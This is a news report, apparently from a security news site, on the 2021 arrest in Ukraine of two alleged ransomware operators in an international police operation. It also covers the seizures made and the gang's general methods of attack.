  15. Law enforcement agencies have announced the arrest of two "prolific ransomware operators" in Ukraine who allegedly conducted a string of targeted attacks against large industrial entities in Europe and North America since at least April 2020, marking the latest step in combating ransomware incidents.

The joint exercise was undertaken on September 28 by officials from the French National Gendarmerie, the Ukrainian National Police, and the U.S. Federal Bureau of Investigation (FBI), with participation from Europol's European Cybercrime Centre and INTERPOL's Cyber Fusion Centre.

"The criminals would deploy malware and steal sensitive data from these companies, before encrypting their files," Europol said in a press statement on Monday. "They would then proceed to offer a decryption key in return for a ransom payment of several millions of euros, threatening to leak the stolen data on the dark web should their demands not be met."

Besides the two arrests, the international police operation saw a total of seven property raids, leading to the seizure of $375,000 in cash and two luxury vehicles costing €217,000 ($251,543), as well as the freezing of cryptocurrency assets worth $1.3 million.

The suspects are believed to have demanded hefty sums ranging anywhere between €5 million and €70 million as part of their extortion spree, and are connected to a gang that has staged ransomware attacks against more than 100 different companies, causing damages upwards of $150 million, according to the Ukrainian National Police. The identity of the syndicate has not been disclosed.

One of the two arrestees, a 25-year-old Ukrainian national, allegedly deployed "virus software" by breaking into remote working programs, with the intrusions staged through social engineering campaigns that delivered spam messages containing malicious content to corporate email inboxes, the agency added.

The development comes over three months after the Ukrainian authorities took steps to arrest members of the Clop ransomware gang and disrupt the infrastructure the group employed in attacks targeting victims worldwide dating all the way back to 2019.

Source: https://thehackernews.com/2021/10/ransomware-hackers-who-attacked-over.html